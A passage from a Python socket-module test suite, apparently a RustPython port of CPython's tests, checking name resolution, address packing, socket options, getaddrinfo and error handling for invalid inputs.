        hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
    except OSError:
        # Probably a similar problem as above; skip this test
        self.skipTest('name lookup failure')
    # The FQDN of the address must be one of the names resolution produced.
    all_host_names = [hostname, hname] + aliases
    fqhn = socket.getfqdn(ip)
    if not fqhn in all_host_names:
        self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
    """Literal IPv4 addresses resolve to themselves."""
    for literal in (support.HOSTv4, '10.0.0.1', '255.255.255.255'):
        self.assertEqual(socket.gethostbyname(literal), literal)
    # support.HOSTv6 is deliberately skipped: there's a chance it has no
    # matching name entry (e.g. 'ip6-localhost').
    for literal in (support.HOSTv4,):
        self.assertIn(literal, socket.gethostbyaddr(literal)[2])
def test_host_resolution_bad_address(self):
    """Malformed IP literals must fail to resolve with OSError."""
    # These are all malformed IP addresses and expected not to resolve to
    # any result. But some ISPs, e.g. AWS, may successfully resolve these
    # IPs.
    explanation = (
        "resolving an invalid IP address did not raise OSError; "
        "can be caused by a broken DNS server"
    )
    for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
                 '1:1:1:1:1:1:1:1:1']:
        with self.assertRaises(OSError, msg=addr):
            socket.gethostbyname(addr)
        with self.assertRaises(OSError, msg=explanation):
            socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
    """sethostname() accepts str and bytes; requires root (EPERM skips)."""
    oldhn = socket.gethostname()
    try:
        socket.sethostname('new')
    except OSError as e:
        if e.errno == errno.EPERM:
            self.skipTest("test should be run as root")
        else:
            raise
    try:
        # running test as root!
        self.assertEqual(socket.gethostname(), 'new')
        # Should work with bytes objects too
        socket.sethostname(b'bar')
        self.assertEqual(socket.gethostname(), 'bar')
    finally:
        # Always restore the original hostname.
        socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
                     'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
    """if_nameindex(), if_nametoindex() and if_indextoname() must agree."""
    interfaces = socket.if_nameindex()
    for index, name in interfaces:
        self.assertIsInstance(index, int)
        self.assertIsInstance(name, str)
        # interface indices are non-zero integers
        self.assertGreater(index, 0)
        _index = socket.if_nametoindex(name)
        self.assertIsInstance(_index, int)
        self.assertEqual(index, _index)
        _name = socket.if_indextoname(index)
        self.assertIsInstance(_name, str)
        self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
                     'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
    """if_indextoname() rejects index 0 (OSError) and a non-int (TypeError)."""
    with self.assertRaises(OSError):
        socket.if_indextoname(0)
    with self.assertRaises(TypeError):
        socket.if_indextoname('_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
                     'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
    """if_nametoindex() rejects a non-str (TypeError) and an unknown name (OSError)."""
    with self.assertRaises(TypeError):
        socket.if_nametoindex(0)
    with self.assertRaises(OSError):
        socket.if_nametoindex('_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
                     'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
    """getnameinfo() must not leak a reference when it raises TypeError."""
    # Testing reference count for getnameinfo
    try:
        # On some versions, this loses a reference
        orig = sys.getrefcount(__name__)
        socket.getnameinfo(__name__,0)
    except TypeError:
        # The refcount of the (rejected) argument must be unchanged.
        if sys.getrefcount(__name__) != orig:
            self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
    """getnameinfo() with a bogus 4-tuple must raise cleanly, not crash."""
    # Making sure getnameinfo doesn't crash the interpreter
    try:
        # On some versions, this crashes the interpreter.
        # Success is also acceptable; only an interpreter crash is a failure.
        socket.getnameinfo(('x', 0, 0, 0), 0)
    except OSError:
        pass
def testNtoH(self):
    """htons/ntohs and htonl/ntohl are self-inverse on their low 16/32 bits."""
    widths = {socket.htonl: 32, socket.ntohl: 32,
              socket.htons: 16, socket.ntohs: 16}
    for convert, bits in widths.items():
        mask = (1 << bits) - 1
        for value in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
            self.assertEqual(value & mask,
                             convert(convert(value & mask)) & mask)
        # The all-ones pattern is a fixed point of byte swapping.
        self.assertEqual(convert(mask) & mask, mask)
        # Values wider than 32 bits must be rejected.
        self.assertRaises(OverflowError, convert, 1 << 34)
@support.cpython_only
def testNtoHErrors(self):
    """ntohs/htons/ntohl/htonl range checks and 16-bit deprecation warnings."""
    import _testcapi
    s_good_values = [0, 1, 2, 0xffff]
    l_good_values = s_good_values + [0xffffffff]
    l_bad_values = [-1, -2, 1<<32, 1<<1000]
    s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
                                   _testcapi.INT_MAX + 1]
    # Values that fit an int but exceed 16 bits are deprecated, not errors.
    s_deprecated_values = [1<<16, _testcapi.INT_MAX]
    for k in s_good_values:
        socket.ntohs(k)
        socket.htons(k)
    for k in l_good_values:
        socket.ntohl(k)
        socket.htonl(k)
    for k in s_bad_values:
        self.assertRaises(OverflowError, socket.ntohs, k)
        self.assertRaises(OverflowError, socket.htons, k)
    for k in l_bad_values:
        self.assertRaises(OverflowError, socket.ntohl, k)
        self.assertRaises(OverflowError, socket.htonl, k)
    for k in s_deprecated_values:
        self.assertWarns(DeprecationWarning, socket.ntohs, k)
        self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
    """getservbyname() and getservbyport() agree; ports are range-checked."""
    eq = self.assertEqual
    # Find one service that exists, then check all the related interfaces.
    # I've ordered this by protocols that have both a tcp and udp
    # protocol, at least for modern Linuxes.
    if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
        or sys.platform in ('linux', 'darwin')):
        # avoid the 'echo' service on this platform, as there is an
        # assumption breaking non-standard port/protocol entry
        services = ('daytime', 'qotd', 'domain')
    else:
        services = ('echo', 'daytime', 'domain')
    for service in services:
        try:
            port = socket.getservbyname(service, 'tcp')
            break
        except OSError:
            pass
    else:
        # No candidate service resolved at all.
        raise OSError
    # Try same call with optional protocol omitted
    # Issue #26936: Android getservbyname() was broken before API 23.
    if (not hasattr(sys, 'getandroidapilevel') or
            sys.getandroidapilevel() >= 23):
        port2 = socket.getservbyname(service)
        eq(port, port2)
    # Try udp, but don't barf if it doesn't exist
    try:
        udpport = socket.getservbyname(service, 'udp')
    except OSError:
        udpport = None
    else:
        eq(udpport, port)
    # Now make sure the lookup by port returns the same service name
    # Issue #26936: Android getservbyport() is broken.
    if not support.is_android:
        eq(socket.getservbyport(port2), service)
    eq(socket.getservbyport(port, 'tcp'), service)
    if udpport is not None:
        eq(socket.getservbyport(udpport, 'udp'), service)
    # Make sure getservbyport does not accept out of range ports.
    self.assertRaises(OverflowError, socket.getservbyport, -1)
    self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
    """setdefaulttimeout() propagates to new sockets and validates input."""
    # Testing default timeout
    # The default timeout should initially be None
    self.assertEqual(socket.getdefaulttimeout(), None)
    with socket.socket() as s:
        self.assertEqual(s.gettimeout(), None)
    # Set the default timeout to 10, and see if it propagates
    with socket_setdefaulttimeout(10):
        self.assertEqual(socket.getdefaulttimeout(), 10)
        with socket.socket() as sock:
            self.assertEqual(sock.gettimeout(), 10)
        # Reset the default timeout to None, and see if it propagates
        socket.setdefaulttimeout(None)
        self.assertEqual(socket.getdefaulttimeout(), None)
        with socket.socket() as sock:
            self.assertEqual(sock.gettimeout(), None)
    # Check that setting it to an invalid value raises ValueError
    self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
    # Check that setting it to an invalid type raises TypeError
    self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
                     'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
    """inet_aton() always yields exactly 4 bytes (issues 1008086 / 767150)."""
    self.assertEqual(socket.inet_aton('0.0.0.0'), b'\x00' * 4)
    self.assertEqual(socket.inet_aton('255.255.255.255'), b'\xff' * 4)
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
                     'test needs socket.inet_pton()')
def testIPv4toString(self):
    """inet_aton() and inet_pton(AF_INET, ...) pack dotted quads identically."""
    from socket import inet_aton as f, inet_pton, AF_INET
    g = lambda a: inet_pton(AF_INET, a)
    assertInvalid = lambda func,a: self.assertRaises(
        (OSError, ValueError), func, a
    )
    self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
    self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
    self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
    self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
    self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
    # bpo-29972: inet_pton() doesn't fail on AIX
    if not AIX:
        assertInvalid(f, '0.0.0.')
        assertInvalid(f, '300.0.0.0')
        assertInvalid(f, 'a.0.0.0')
        assertInvalid(f, '1.2.3.4.5')
        assertInvalid(f, '::1')
    self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
    self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
    self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
    self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
    assertInvalid(g, '0.0.0.')
    assertInvalid(g, '300.0.0.0')
    assertInvalid(g, 'a.0.0.0')
    assertInvalid(g, '1.2.3.4.5')
    assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
                     'test needs socket.inet_pton()')
def testIPv6toString(self):
    """inet_pton(AF_INET6, ...) packs valid literals and rejects malformed ones."""
    try:
        from socket import inet_pton, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')
    if sys.platform == "win32":
        try:
            inet_pton(AF_INET6, '::')
        except OSError as e:
            # WSAEINVAL: IPv6 stack not installed.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')
    f = lambda a: inet_pton(AF_INET6, a)
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )
    self.assertEqual(b'\x00' * 16, f('::'))
    self.assertEqual(b'\x00' * 16, f('0::0'))
    self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
    self.assertEqual(
        b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
        f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
    )
    self.assertEqual(
        b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
        f('ad42:abc::127:0:254:2')
    )
    self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
    assertInvalid('0x20::')
    assertInvalid(':::')
    assertInvalid('::0::')
    assertInvalid('1::abc::')
    assertInvalid('1::abc::def')
    assertInvalid('1:2:3:4:5:6')
    assertInvalid('1:2:3:4:5:6:')
    assertInvalid('1:2:3:4:5:6:7:8:0')
    # bpo-29972: inet_pton() doesn't fail on AIX
    if not AIX:
        assertInvalid('1:2:3:4:5:6:7:8:')
    # Mixed IPv6/IPv4 notation.
    self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
        f('::254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
        f('42::a29b:254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
        f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
    )
    assertInvalid('255.254.253.252')
    assertInvalid('1::260.2.3.0')
    assertInvalid('1::0.be.e.0')
    assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
    assertInvalid('::1.2.3.4:0')
    assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv4(self):
    """inet_ntoa() and inet_ntop(AF_INET, ...) unpack 4-byte addresses identically."""
    from socket import inet_ntoa as f, inet_ntop, AF_INET
    g = lambda a: inet_ntop(AF_INET, a)
    assertInvalid = lambda func,a: self.assertRaises(
        (OSError, ValueError), func, a
    )
    self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
    self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
    # Only exactly 4 bytes are acceptable.
    assertInvalid(f, b'\x00' * 3)
    assertInvalid(f, b'\x00' * 5)
    assertInvalid(f, b'\x00' * 16)
    self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
    self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
    assertInvalid(g, b'\x00' * 3)
    assertInvalid(g, b'\x00' * 5)
    assertInvalid(g, b'\x00' * 16)
    self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv6(self):
    """inet_ntop(AF_INET6, ...) formats 16-byte addresses and rejects other sizes."""
    try:
        from socket import inet_ntop, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')
    if sys.platform == "win32":
        try:
            inet_ntop(AF_INET6, b'\x00' * 16)
        except OSError as e:
            # WSAEINVAL: IPv6 stack not installed.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')
    f = lambda a: inet_ntop(AF_INET6, a)
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )
    self.assertEqual('::', f(b'\x00' * 16))
    self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
    self.assertEqual(
        'aef:b01:506:1001:ffff:9997:55:170',
        f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
    )
    self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
    # Only exactly 16 bytes are acceptable.
    assertInvalid(b'\x12' * 15)
    assertInvalid(b'\x12' * 17)
    assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
    """getsockname() reflects the bound address and port."""
    # Testing getsockname()
    port = support.find_unused_port()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(sock.close)
    sock.bind(("0.0.0.0", port))
    name = sock.getsockname()
    # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it is
    # reasonable to get the host's addr in addition to 0.0.0.0.
    # At least for eCos. This is required for the S/390 to pass.
    try:
        my_ip_addr = socket.gethostbyname(socket.gethostname())
    except OSError:
        # Probably name lookup wasn't set up right; skip this test
        self.skipTest('name lookup failure')
    self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
    self.assertEqual(name[1], port)
def testGetSockOpt(self):
    """A freshly created TCP socket has SO_REUSEADDR off by default."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(probe.close)
    reuse_flag = probe.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
    self.assertFalse(reuse_flag != 0, "initial mode is reuse")
def testSetSockOpt(self):
    """setsockopt() enables SO_REUSEADDR and getsockopt() reflects it."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(probe.close)
    probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    reuse_flag = probe.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
    self.assertFalse(reuse_flag == 0, "failed to set reuse mode")
def testSendAfterClose(self):
    """send() on an already-closed socket raises OSError."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with sock:
        sock.settimeout(1)
    # The with-block closed the socket; sending must now fail.
    self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
    """close() on a socket whose fd was closed elsewhere raises EBADF/ENOTSOCK."""
    sock = socket.socket()
    sock.bind((socket._LOCALHOST, 0))
    # Wrap the same fd in a second socket object and close it, invalidating
    # the fd underneath the first socket.
    socket.socket(fileno=sock.fileno()).close()
    try:
        sock.close()
    except OSError as err:
        # Winsock apparently raises ENOTSOCK
        self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
    else:
        self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
    """The family, type and proto attributes reflect the creation arguments."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        self.assertEqual(sock.family, socket.AF_INET)
        # Some kernels fold SOCK_CLOEXEC into the reported socket type.
        acceptable_types = {socket.SOCK_STREAM}
        if hasattr(socket, 'SOCK_CLOEXEC'):
            acceptable_types.add(socket.SOCK_STREAM | socket.SOCK_CLOEXEC)
        self.assertIn(sock.type, acceptable_types)
        self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
    """bind() rejects out-of-range port numbers with OverflowError."""
    sock = socket.socket()
    self.addCleanup(sock.close)
    port = support.find_unused_port()
    big_port = port + 65536
    neg_port = port - 65536
    self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
    self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
    # Since find_unused_port() is inherently subject to race conditions, we
    # call it a couple times if necessary.
    for i in itertools.count():
        port = support.find_unused_port()
        try:
            sock.bind((HOST, port))
        except OSError as e:
            # Give up after 6 attempts or on any unexpected errno.
            if e.errno != errno.EADDRINUSE or i == 5:
                raise
        else:
            break
@unittest.skipUnless(os.name == "nt", "Windows specific")
# TODO: RUSTPYTHON, windows ioctls
@unittest.expectedFailure
def test_sock_ioctl(self):
    """Windows socket ioctl constants exist and ioctl() validates its arguments."""
    self.assertTrue(hasattr(socket.socket, 'ioctl'))
    self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
    self.assertTrue(hasattr(socket, 'RCVALL_ON'))
    self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
    self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
    s = socket.socket()
    self.addCleanup(s.close)
    # An unknown control code is rejected.
    self.assertRaises(ValueError, s.ioctl, -1, None)
    s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
                     'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
    """SIO_LOOPBACK_FAST_PATH ioctl accepts a bool and rejects None.

    Skips when the OS defines the constant but does not implement the
    ioctl (WSAEOPNOTSUPP).
    """
    s = socket.socket()
    self.addCleanup(s.close)
    try:
        s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
    except OSError as exc:
        WSAEOPNOTSUPP = 10045
        if exc.winerror == WSAEOPNOTSUPP:
            # Fixed grammar of the skip message ("doesn't implemented").
            self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                          "isn't implemented in this Windows version")
        raise
    # A non-bool-convertible argument must be rejected.
    self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
    """Exercise getaddrinfo() argument forms, filters and keyword arguments."""
    try:
        socket.getaddrinfo('localhost', 80)
    except socket.gaierror as err:
        if err.errno == socket.EAI_SERVICE:
            # see http://bugs.python.org/issue1282647
            self.skipTest("buggy libc version")
        raise
    # len of every sequence is supposed to be == 5
    for info in socket.getaddrinfo(HOST, None):
        self.assertEqual(len(info), 5)
    # host can be a domain name, a string representation of an
    # IPv4/v6 address or None
    socket.getaddrinfo('localhost', 80)
    socket.getaddrinfo('127.0.0.1', 80)
    socket.getaddrinfo(None, 80)
    if support.IPV6_ENABLED:
        socket.getaddrinfo('::1', 80)
    # port can be a string service name such as "http", a numeric
    # port number or None
    # Issue #26936: Android getaddrinfo() was broken before API level 23.
    if (not hasattr(sys, 'getandroidapilevel') or
            sys.getandroidapilevel() >= 23):
        socket.getaddrinfo(HOST, "http")
    socket.getaddrinfo(HOST, 80)
    socket.getaddrinfo(HOST, None)
    # test family and socktype filters
    infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
    for family, type, _, _, _ in infos:
        self.assertEqual(family, socket.AF_INET)
        self.assertEqual(str(family), 'AddressFamily.AF_INET')
        self.assertEqual(type, socket.SOCK_STREAM)
        self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
    infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    for _, socktype, _, _, _ in infos:
        self.assertEqual(socktype, socket.SOCK_STREAM)
    # test proto and flags arguments
    socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    # a server willing to support both IPv4 and IPv6 will
    # usually do this
    socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                       socket.AI_PASSIVE)
    # test keyword arguments: each keyword call must match its
    # positional equivalent
    a = socket.getaddrinfo(HOST, None)
    b = socket.getaddrinfo(host=HOST, port=None)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, socket.AF_INET)
    b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                           socket.AI_PASSIVE)
    b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
                           type=socket.SOCK_STREAM, proto=0,
                           flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    # Issue #6697.
    # XXX RUSTPYTHON TODO: surrogates in str
    # self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
    # Issue 17269: test workaround for OS X platform bug segfault
    if hasattr(socket, 'AI_NUMERICSERV'):
        try:
            # The arguments here are undefined and the call may succeed
            # or fail. All we care here is that it doesn't segfault.
            socket.getaddrinfo("localhost", None, 0, 0, 0,
                               socket.AI_NUMERICSERV)
        except socket.gaierror:
            pass
def test_getnameinfo(self):
    """getnameinfo() accepts only numeric addresses, not host names."""
    with self.assertRaises(OSError):
        socket.getnameinfo(('mail.python.org', 0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
                     'network is not enabled')
# TODO: RUSTPYTHON, socket.gethostbyname_ex
@unittest.expectedFailure
def test_idna(self):
    """Non-ASCII (IDNA) host names resolve through the name-lookup APIs."""
    # Check for internet access before running test
    # (issue #12804, issue #25138).
    with support.transient_internet('python.org'):
        socket.gethostbyname('python.org')
    # these should all be successful
    domain = 'испытание.pythontest.net'
    socket.gethostbyname(domain)
    socket.gethostbyname_ex(domain)
    socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
    # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
    # have a reverse entry yet
    # socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
    """Helper: verify sendall() behavior when interrupted by SIGALRM.

    With *with_timeout* False, an exception raised in the signal handler
    must propagate; with it True, a later benign handler must let the
    sendall() fail with socket.timeout instead.
    """
    # socketpair() is not strictly required, but it makes things easier.
    if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
        self.skipTest("signal.alarm and socket.socketpair required for this test")
    # Our signal handlers clobber the C errno by calling a math function
    # with an invalid domain value.
    def ok_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
    def raising_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
        1 // 0
    c, s = socket.socketpair()
    old_alarm = signal.signal(signal.SIGALRM, raising_handler)
    try:
        if with_timeout:
            # Just above the one second minimum for signal.alarm
            c.settimeout(1.5)
        with self.assertRaises(ZeroDivisionError):
            signal.alarm(1)
            c.sendall(b"x" * support.SOCK_MAX_SIZE)
        if with_timeout:
            signal.signal(signal.SIGALRM, ok_handler)
            signal.alarm(1)
            self.assertRaises(socket.timeout, c.sendall,
                              b"x" * support.SOCK_MAX_SIZE)
    finally:
        # Cancel any pending alarm and restore the previous handler.
        signal.alarm(0)
        signal.signal(signal.SIGALRM, old_alarm)
        c.close()
        s.close()
def test_sendall_interrupted(self):
    """sendall() interrupted by SIGALRM, without a socket timeout."""
    self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
    """sendall() interrupted by SIGALRM, with a socket timeout set."""
    self.check_sendall_interrupted(True)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dealloc_warn(self):
    """Dropping the last reference to an open socket emits a ResourceWarning."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    r = repr(sock)
    with self.assertWarns(ResourceWarning) as cm:
        sock = None
        support.gc_collect()
    # The warning message must identify the leaked socket.
    self.assertIn(r, str(cm.warning.args[0]))
    # An open socket file object gets dereferenced after the socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    f = sock.makefile('rb')
    r = repr(sock)
    sock = None
    support.gc_collect()
    with self.assertWarns(ResourceWarning):
        f = None
        support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_name_closed_socketio(self):
    """A closed makefile() wrapper reports name=-1 in its repr."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        reader = sock.makefile("rb")
        reader.close()
        self.assertEqual(repr(reader), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
    """readable/writable/seekable raise ValueError once the file is closed."""
    with socket.socket() as sock:
        raw = sock.makefile("rb", buffering=0)
        self.assertTrue(raw.readable())
        self.assertFalse(raw.writable())
        self.assertFalse(raw.seekable())
        raw.close()
        # Every capability probe must now reject the closed file.
        for probe in (raw.readable, raw.writable, raw.seekable):
            self.assertRaises(ValueError, probe)
def test_socket_close(self):
    """socket.close(fd) closes the fd; bad fds raise OSError, None raises TypeError."""
    sock = socket.socket()
    try:
        sock.bind((HOST, 0))
        socket.close(sock.fileno())
        # The underlying fd is gone, so further operations must fail.
        with self.assertRaises(OSError):
            sock.listen(1)
    finally:
        with self.assertRaises(OSError):
            # sock.close() fails with EBADF
            sock.close()
    with self.assertRaises(TypeError):
        socket.close(None)
    with self.assertRaises(OSError):
        socket.close(-1)
def test_makefile_mode(self):
    """makefile() preserves each valid mode string on the file wrapper."""
    for mode in ('r', 'rb', 'rw', 'w', 'wb'):
        with self.subTest(mode=mode), socket.socket() as sock:
            with sock.makefile(mode) as fp:
                self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
    """makefile() rejects text/exclusive/append modes with ValueError."""
    for mode in ('rt', 'x', '+', 'a'):
        with self.subTest(mode=mode), socket.socket() as sock:
            with self.assertRaisesRegex(ValueError, 'invalid mode'):
                sock.makefile(mode)
def test_pickle(self):
    """Sockets are unpicklable; AF_/SOCK_ enum constants round-trip."""
    sock = socket.socket()
    with sock:
        for proto_level in range(pickle.HIGHEST_PROTOCOL + 1):
            self.assertRaises(TypeError, pickle.dumps, sock, proto_level)
    for proto_level in range(pickle.HIGHEST_PROTOCOL + 1):
        restored_family = pickle.loads(
            pickle.dumps(socket.AF_INET, proto_level))
        self.assertEqual(restored_family, socket.AF_INET)
        restored_kind = pickle.loads(
            pickle.dumps(socket.SOCK_STREAM, proto_level))
        self.assertEqual(restored_kind, socket.SOCK_STREAM)
def test_listen_backlog(self):
    """listen() accepts zero, negative, and omitted backlog values."""
    for backlog in (0, -1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.bind((HOST, 0))
            srv.listen(backlog)
    # Calling listen() without any backlog argument must also work.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
    """listen() rejects a backlog larger than INT_MAX (issue 15989)."""
    # Issue 15989
    import _testcapi
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
    """Out-of-range IPv6 flowinfo values raise OverflowError."""
    self.assertRaises(OverflowError, socket.getnameinfo,
                      (support.HOSTv6, 0, 0xffffffff), 0)
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
